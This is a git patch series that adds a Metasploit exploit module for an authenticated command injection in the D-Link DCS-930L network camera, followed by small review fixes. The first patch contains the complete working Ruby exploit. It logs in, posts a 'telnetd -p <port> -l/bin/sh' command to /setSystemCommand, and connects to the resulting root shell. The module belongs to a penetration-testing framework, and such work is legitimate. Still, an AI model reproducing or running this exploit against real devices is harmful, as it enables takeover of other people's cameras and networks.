From 8c8cdd9912c690485c1a871688e9eb4358c49934 Mon Sep 17 00:00:00 2001 From: Nicholas Starke Date: Sat, 23 Jan 2016 11:15:23 -0600 Subject: [PATCH 1/6] Adding Dlink DCS Authenticated RCE Module This module takes advantage of an authenticated HTTP RCE vulnerability to start telnet on a random port. The module then connects to that telnet session and returns a shell. This vulnerability is present in version 2.01 of the firmware and resolved by version 2.12. --- ..._authenticated_remote_command_execution.rb | 170 ++++++++++++++++++ 1 file changed, 170 insertions(+) create mode 100644 modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb diff --git a/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb b/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb new file mode 100644 index 0000000000..3b1a7b690b --- /dev/null +++ b/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb @@ -0,0 +1,170 @@ +## +## This module requires Metasploit: http://metasploit.com/download +## Current source: https://github.com/rapid7/metasploit-framework +### + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + + include Msf::Exploit::Remote::Telnet + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'D-Link DCS-930L Authenticated Remote Command Execution', + 'Description' => %q{ + The D-Link DCS-930L Network Video Camera is vulnerable + to OS Command Injection via the web interface. The vulnerability + exists at /setSystemCommand, which is accessible with credentials. + This vulnerability was present in firmware version 2.01 and fixed + by 2.12. + }, + 'Author' => + [ + 'Nicholas Starke ' + ], + 'License' => MSF_LICENSE, + 'DisclosureDate' => 'December 20 2015', + 'Privileged' => true, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Payload' => + { + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find', + }, + }, + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, + 'Targets' => + [ + [ 'Automatic', { } ], + ], + 'DefaultTarget' => 0 + )) + + register_options( + [ + OptString.new('USERNAME', [ true, 'User to login with', 'admin']), + OptString.new('PASSWORD', [ false, 'Password to login with', '']) + ], self.class) + + register_advanced_options( + [ + OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet Command', 10]), + OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25]) + ], self.class) + end + + def telnet_timeout + (datastore['TelnetTimeout'] || 10).to_i + end + + def banner_timeout + (datastore['TelnetBannerTimeout'] || 25).to_i + end + + def exploit + print_status('Exploiting') + user = datastore['USERNAME'] + if datastore['PASSWORD'].nil? + pass = "" + else + pass = datastore['PASSWORD'] + end + test_login(user, pass) + exploit_telnet + end + + def test_login(user, pass) + print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}") + begin + res = send_request_cgi({ + 'uri' => '/', + 'method' => 'GET', + 'authorization' => basic_auth(user, pass) + }) + + if res.nil? + fail_with(Failure::Unknown, "#{rhost}:#{rport} - Could not connect to web service - no response") + end + + if (res.code != 200) + fail_with(Failure::Unknown, "#{rhost}:#{rport} - Could not connect to web service - invalid credentials (response code: #{res.code}") + else + print_good("#{rhost}:#{rport} - Successful login #{user} / #{pass}") + end + rescue ::Rex::ConnectionError + fail_with(Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the web service") + end + end + + def exploit_telnet + telnet_port = rand(32767) + 32768 + + print_status("#{rhost}:#{rport} - Telnet Port: #{telnet_port}") + + cmd = "telnetd -p #{telnet_port} -l/bin/sh" + + telnet_request(cmd) + + print_status("#{rhost}:#{telnet_port} - Trying to establish telnet connection...") + ctx = { 'Msf' => framework, 'MsfExploit' => self } + sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port, 'Context' => ctx, 'Timeout' => 0 }) + + if sock.nil? + fail_with(Failure::Unreachable, "#{rhost}:#{telnet_port} - Backdoor servie unreachable") + end + + add_socket(sock) + + print_status("#{rhost}:#{telnet_port} - Trying to establish a telnet session...") + prompt = negotiate_telnet(sock) + + if prompt.nil? + sock.close + fail_with(Failure::Unknown, "#{rhost}:#{telnet_port} - Unable to establish a telnet session") + else + print_good("#{rhost}:#{telnet_port} - Telnet session successfully established") + end + + handler(sock) + end + + def telnet_request(cmd) + uri = '/setSystemCommand' + + begin + res = send_request_cgi({ + 'uri' => uri, + 'method' => 'POST', + 'vars_post' => { + 'ReplySuccessPage' => 'docmd.htm', + 'ReplyErrorPage' => 'docmd.htm', + 'SystemCommand' => cmd, + 'ConfigSystemCommand' => 'Save' + } + }) + return res + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{rhost}:#{rport} - Could not connect to the web service") + end + end + + def negotiate_telnet(sock) + begin + Timeout.timeout(banner_timeout) do + while(true) + data = sock.get_once(-1, telnet_timeout) + return nil if not data or data.length == 0 + if data =~ /BusyBox/ + return true + end + end + end + rescue ::Timeout::Error + return nil + end + end +end From a5a2e7c06b7db21babe1bbcb54f18697d372f9b7 Mon Sep 17 00:00:00 2001 From: Nicholas Starke Date: Sat, 23 Jan 2016 11:41:05 -0600 Subject: [PATCH 2/6] Fixing Disclosure Date Disclosure date was in incorrect format, this commit fixes the issue --- .../dlink_dcs_930l_authenticated_remote_command_execution.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb b/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb index 3b1a7b690b..b2e6c1e816 100644 --- a/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb +++ b/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb @@ -25,7 +25,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Nicholas Starke ' ], 'License' => MSF_LICENSE, - 'DisclosureDate' => 'December 20 2015', + 'DisclosureDate' => 'Dec 20 2015', 'Privileged' => true, 'Platform' => 'unix', 'Arch' => ARCH_CMD, From d877522ea52a3f59b198fd1e5d79f9c006cec518 Mon Sep 17 00:00:00 2001 From: Nicholas Starke Date: Sat, 23 Jan 2016 13:43:09 -0600 Subject: [PATCH 3/6] Fixing various issues from comments This commit fixes issues with specifying "rhost:rport", replacing them instead with "peer". Also, a couple of "Unknown" errors were replaced with "UnexpectedReply". --- ..._930l_authenticated_remote_command_execution.rb | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb b/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb index b2e6c1e816..ce80caa726 100644 --- a/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb +++ b/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb @@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote end def test_login(user, pass) - print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}") + print_status("#{peer} - Trying to login with #{user} / #{pass}") begin res = send_request_cgi({ 'uri' => '/', @@ -87,23 +87,23 @@ class Metasploit3 < Msf::Exploit::Remote }) if res.nil? - fail_with(Failure::Unknown, "#{rhost}:#{rport} - Could not connect to web service - no response") + fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") end if (res.code != 200) - fail_with(Failure::Unknown, "#{rhost}:#{rport} - Could not connect to web service - invalid credentials (response code: #{res.code}") + fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - invalid credentials (response code: #{res.code}") else - print_good("#{rhost}:#{rport} - Successful login #{user} / #{pass}") + print_good("#{peer} - Successful login #{user} / #{pass}") end rescue ::Rex::ConnectionError - fail_with(Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the web service") + fail_with(Failure::Unknown, "#{peer} - Could not connect to the web service") end end def exploit_telnet telnet_port = rand(32767) + 32768 - print_status("#{rhost}:#{rport} - Telnet Port: #{telnet_port}") + print_status("#{peer} - Telnet Port: #{telnet_port}") cmd = "telnetd -p #{telnet_port} -l/bin/sh" @@ -148,7 +148,7 @@ class Metasploit3 < Msf::Exploit::Remote }) return res rescue ::Rex::ConnectionError - fail_with(Failure::Unreachable, "#{rhost}:#{rport} - Could not connect to the web service") + fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") end end From 4560d553b5dc42c273652d6f3e44342aafd701a5 Mon Sep 17 00:00:00 2001 From: Nicholas Starke Date: Sun, 24 Jan 2016 19:43:02 -0600 Subject: [PATCH 4/6] Fixing more issues from comments This commit includes more minor fixes from the github comments for this PR. --- ..._authenticated_remote_command_execution.rb | 40 +++++++------------ 1 file changed, 14 insertions(+), 26 deletions(-) diff --git a/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb b/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb index ce80caa726..848bad21e9 100644 --- a/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb +++ b/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb @@ -58,46 +58,34 @@ class Metasploit3 < Msf::Exploit::Remote end def telnet_timeout - (datastore['TelnetTimeout'] || 10).to_i + (datastore['TelnetTimeout'] || 10) end def banner_timeout - (datastore['TelnetBannerTimeout'] || 25).to_i + (datastore['TelnetBannerTimeout'] || 25) end def exploit - print_status('Exploiting') user = datastore['USERNAME'] - if datastore['PASSWORD'].nil? - pass = "" - else - pass = datastore['PASSWORD'] - end + pass = datastore['PASSWORD'] || '' + test_login(user, pass) exploit_telnet end def test_login(user, pass) print_status("#{peer} - Trying to login with #{user} / #{pass}") - begin - res = send_request_cgi({ - 'uri' => '/', - 'method' => 'GET', - 'authorization' => basic_auth(user, pass) - }) - if res.nil? - fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") - end + res = send_request_cgi({ + 'uri' => '/', + 'method' => 'GET', + 'authorization' => basic_auth(user, pass) + }) - if (res.code != 200) - fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - invalid credentials (response code: #{res.code}") - else - print_good("#{peer} - Successful login #{user} / #{pass}") - end - rescue ::Rex::ConnectionError - fail_with(Failure::Unknown, "#{peer} - Could not connect to the web service") - end + fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil? + fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - invalid credentials (response code: #{res.code}") if res.code != 200 + + print_good("#{peer} - Successful login #{user} / #{pass}") end def exploit_telnet @@ -111,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("#{rhost}:#{telnet_port} - Trying to establish telnet connection...") ctx = { 'Msf' => framework, 'MsfExploit' => self } - sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port, 'Context' => ctx, 'Timeout' => 0 }) + sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port, 'Context' => ctx, 'Timeout' => telnet_timeout }) if sock.nil? fail_with(Failure::Unreachable, "#{rhost}:#{telnet_port} - Backdoor servie unreachable") From 1ef7aef9969de70c9630ed13bb691622602834d8 Mon Sep 17 00:00:00 2001 From: Nicholas Starke Date: Wed, 27 Jan 2016 17:20:58 -0600 Subject: [PATCH 5/6] Fixing User : Pass delimiter As per the PR comments, this commit replaces the user and pass delimiter from "/" to ":" --- .../dlink_dcs_930l_authenticated_remote_command_execution.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb b/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb index 848bad21e9..2e1fab9064 100644 --- a/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb +++ b/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb @@ -74,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote end def test_login(user, pass) - print_status("#{peer} - Trying to login with #{user} / #{pass}") + print_status("#{peer} - Trying to login with #{user} : #{pass}") res = send_request_cgi({ 'uri' => '/', @@ -85,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil? fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - invalid credentials (response code: #{res.code}") if res.code != 200 - print_good("#{peer} - Successful login #{user} / #{pass}") + print_good("#{peer} - Successful login #{user} : #{pass}") end def exploit_telnet From d51be6e3dad3b7a703c835f86e8d7aaddbe8eeba Mon Sep 17 00:00:00 2001 From: Nicholas Starke Date: Thu, 28 Jan 2016 16:44:42 -0600 Subject: [PATCH 6/6] Fixing typo This commit fixes a typo in the word "service" --- .../dlink_dcs_930l_authenticated_remote_command_execution.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb b/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb index 2e1fab9064..543ac2c857 100644 --- a/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb +++ b/modules/exploits/linux/http/dlink_dcs_930l_authenticated_remote_command_execution.rb @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port, 'Context' => ctx, 'Timeout' => telnet_timeout }) if sock.nil? - fail_with(Failure::Unreachable, "#{rhost}:#{telnet_port} - Backdoor servie unreachable") + fail_with(Failure::Unreachable, "#{rhost}:#{telnet_port} - Backdoor service unreachable") end add_socket(sock)